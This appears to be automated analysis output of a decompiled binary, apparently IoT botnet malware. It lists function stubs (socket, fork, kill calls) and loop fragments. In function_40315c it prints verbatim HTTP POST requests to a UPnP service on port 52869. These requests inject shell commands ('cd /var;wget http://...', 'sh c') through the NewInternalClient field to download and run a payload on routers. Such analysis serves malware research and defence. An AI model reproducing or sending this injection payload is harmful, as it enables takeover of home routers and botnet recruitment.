++++++++ FUNCTION END 1919
++++++++ FUNCTION LENGTH 430
    while (true) {
=================FUNCTION : function_404b50 ===================
++++++++ FUNCTION START 23036
++++++++ FUNCTION END 23446
++++++++ FUNCTION LENGTH 410
    int32_t v397 = kill(pid, sig_num); // 0x404b70
=================FUNCTION : function_406ed0 ===================
++++++++ FUNCTION START 47167
++++++++ FUNCTION END 47622
++++++++ FUNCTION LENGTH 455
    while (true) {
=================FUNCTION : function_4045d0 ===================
++++++++ FUNCTION START 18408
++++++++ FUNCTION END 18855
++++++++ FUNCTION LENGTH 447
    while (true) {
=================FUNCTION : function_407100 ===================
++++++++ FUNCTION START 48038
++++++++ FUNCTION END 48448
++++++++ FUNCTION LENGTH 410
    int32_t v397 = geteuid(); // 0x407120
=================FUNCTION : function_4070a0 ===================
++++++++ FUNCTION START 47625
++++++++ FUNCTION END 48035
++++++++ FUNCTION LENGTH 410
    int32_t v397 = getegid(); // 0x4070c0
=================FUNCTION : function_4060d0 ===================
++++++++ FUNCTION START 39564
++++++++ FUNCTION END 40014
++++++++ FUNCTION LENGTH 450
    while (true) {
=================FUNCTION : function_404a30 ===================
++++++++ FUNCTION START 21797
++++++++ FUNCTION END 22207
++++++++ FUNCTION LENGTH 410
    int32_t v397 = fork(); // 0x404a50
=================FUNCTION : function_4056c0 ===================
++++++++ FUNCTION START 32341
++++++++ FUNCTION END 32751
++++++++ FUNCTION LENGTH 410
    int32_t v397 = connect(sock, addr, addr_len); // 0x4056e0
=================FUNCTION : function_407700 ===================
++++++++ FUNCTION START 52197
++++++++ FUNCTION END 52852
++++++++ FUNCTION LENGTH 655
        while (true) {
=================FUNCTION : function_400420 ===================
++++++++ FUNCTION START 1922
++++++++ FUNCTION END 2378
++++++++ FUNCTION LENGTH 456
    while (true) {
=================FUNCTION : function_405780 ===================
++++++++ FUNCTION START 33167
++++++++ FUNCTION END 33576
++++++++ FUNCTION LENGTH 409
    int32_t v397 = getsockopt(sock, level, option_name, option_value, NULL); // 0x4057b8
=================FUNCTION : function_404a90 ===================
++++++++ FUNCTION START 22210
++++++++ FUNCTION END 22620
++++++++ FUNCTION LENGTH 410
    int32_t pid = getpid(); // 0x404ab0
=================FUNCTION : function_405800 ===================
++++++++ FUNCTION START 33579
++++++++ FUNCTION END 33988
++++++++ FUNCTION LENGTH 409
    int32_t v397 = listen(sock, backlog); // 0x405820
=================FUNCTION : function_405390 ===================
++++++++ FUNCTION START 29327
++++++++ FUNCTION END 29766
++++++++ FUNCTION LENGTH 439
    while (true) {
=================FUNCTION : function_405a20 ===================
++++++++ FUNCTION START 35639
++++++++ FUNCTION END 36048
++++++++ FUNCTION LENGTH 409
    int32_t v397 = setsockopt(sock, level, option_name, option_value, 0); // 0x405a58
=================FUNCTION : function_404404 ===================
++++++++ FUNCTION START 17188
++++++++ FUNCTION END 17624
++++++++ FUNCTION LENGTH 436
    while (true) {
=================FUNCTION : function_407160 ===================
++++++++ FUNCTION START 48451
++++++++ FUNCTION END 48861
++++++++ FUNCTION LENGTH 410
    int32_t v397 = getgid(); // 0x407180
=================FUNCTION : function_405660 ===================
++++++++ FUNCTION START 31929
++++++++ FUNCTION END 32338
++++++++ FUNCTION LENGTH 409
    int32_t v397 = bind(sock, addr, addr_len); // 0x405680
=================FUNCTION : function_404314 ===================
++++++++ FUNCTION START 16741
++++++++ FUNCTION END 17185
++++++++ FUNCTION LENGTH 444
        while (true) {
=================FUNCTION : function_4071c0 ===================
++++++++ FUNCTION START 48864
++++++++ FUNCTION END 49274
++++++++ FUNCTION LENGTH 410
    int32_t v397 = getuid(); // 0x4071e0
=================FUNCTION : function_4047d0 ===================
++++++++ FUNCTION START 19676
++++++++ FUNCTION END 20133
++++++++ FUNCTION LENGTH 457
    while (true) {
=================FUNCTION : function_400584 ===================
++++++++ FUNCTION START 2381
++++++++ FUNCTION END 2810
++++++++ FUNCTION LENGTH 429
    while (true) {
=================FUNCTION : function_405720 ===================
++++++++ FUNCTION START 32754
++++++++ FUNCTION END 33164
++++++++ FUNCTION LENGTH 410
    int32_t v397 = getsockname(sock, addr, (int32_t *)addr_len); // 0x405740
=================FUNCTION : function_404af0 ===================
++++++++ FUNCTION START 22623
++++++++ FUNCTION END 23033
++++++++ FUNCTION LENGTH 410
    int32_t ppid = getppid(); // 0x404b10
=================FUNCTION : function_404bb0 ===================
++++++++ FUNCTION START 23449
++++++++ FUNCTION END 23865
++++++++ FUNCTION LENGTH 416
    int32_t fd = open(path, oflag); // 0x404bf4
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 4 @ function_400624 ====================================
++++++++ WHILE START : 3251 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3349 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 5 @ function_400624 ====================================
++++++++ WHILE START : 3358 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3390 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 6 @ function_400624 ====================================
++++++++ WHILE START : 3398 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3430 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 7 @ function_400624 ====================================
++++++++ WHILE START : 3438 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3470 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 8 @ function_400624 ====================================
++++++++ WHILE START : 3478 
++++++++ WHILE FUNCTION : function_400624 
++++++++ WHILE END : 3510 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_400c78 ====================================
++++++++ WHILE START : 5210 
++++++++ WHILE FUNCTION : function_400c78 
++++++++ WHILE END : 5268 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 12 @ function_400dc0 ====================================
++++++++ WHILE START : 5675 
++++++++ WHILE FUNCTION : function_400dc0 
++++++++ WHILE END : 5736 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 16 @ function_401078 ====================================
++++++++ WHILE START : 7623 
++++++++ WHILE FUNCTION : function_401078 
++++++++ WHILE END : 7794 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 17 @ function_401eec ====================================
++++++++ WHILE START : 8797 
++++++++ WHILE FUNCTION : function_401eec 
++++++++ WHILE END : 9128 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		function_4056c0(v444, (struct sockaddr *)&v442, 16);
		case 263: {
		while (true) {
		case 0: {
		while (true) {
		case 11: {
		while (true) {
		case 4: {
		case 11: {
		while (true) {
		case 4: {
=============================WHILE LOOPS ID : 18 @ function_402a7c ====================================
++++++++ WHILE START : 10769 
++++++++ WHILE FUNCTION : function_402a7c 
++++++++ WHILE END : 11443 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		if (function_4056c0(v446, (struct sockaddr *)&v420, 16) != a1) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		if (function_4056c0(v446, (struct sockaddr *)&v420, 16) != a1) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 19 @ function_40315c ====================================
++++++++ WHILE START : 12376 
++++++++ WHILE FUNCTION : function_40315c 
++++++++ WHILE END : 12851 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 590\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;>c");
		function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
		function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 623\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;wget http://");
		function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
		function_404284((char *)&v420, (int32_t)"POST /wanipcn.xml HTTP/1.1\r\nHost: 127.0.0.1:52869\r\nContent-Length: 592\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var;sh c");
		function_404224((char *)&v420, (int32_t)"`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n");
=============================WHILE LOOPS ID : 20 @ function_40315c ====================================
++++++++ WHILE START : 12856 
++++++++ WHILE FUNCTION : function_40315c 
++++++++ WHILE END : 12929 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_403fe8 ====================================
++++++++ WHILE START : 13766 
++++++++ WHILE FUNCTION : function_403fe8 
++++++++ WHILE END : 13846 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 24 @ function_404464 ====================================
++++++++ WHILE START : 18025 
++++++++ WHILE FUNCTION : function_404464 
++++++++ WHILE END : 18404 
++++++++ INTRESTING INSTRUCTIONS :  
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		while (true) {
		case 32: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
		case 9: {
=============================WHILE LOOPS ID : 34 @ function_407b70 ====================================
++++++++ WHILE START : 53974 
++++++++ WHILE FUNCTION : function_407b70 
++++++++ WHILE END : 54048 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
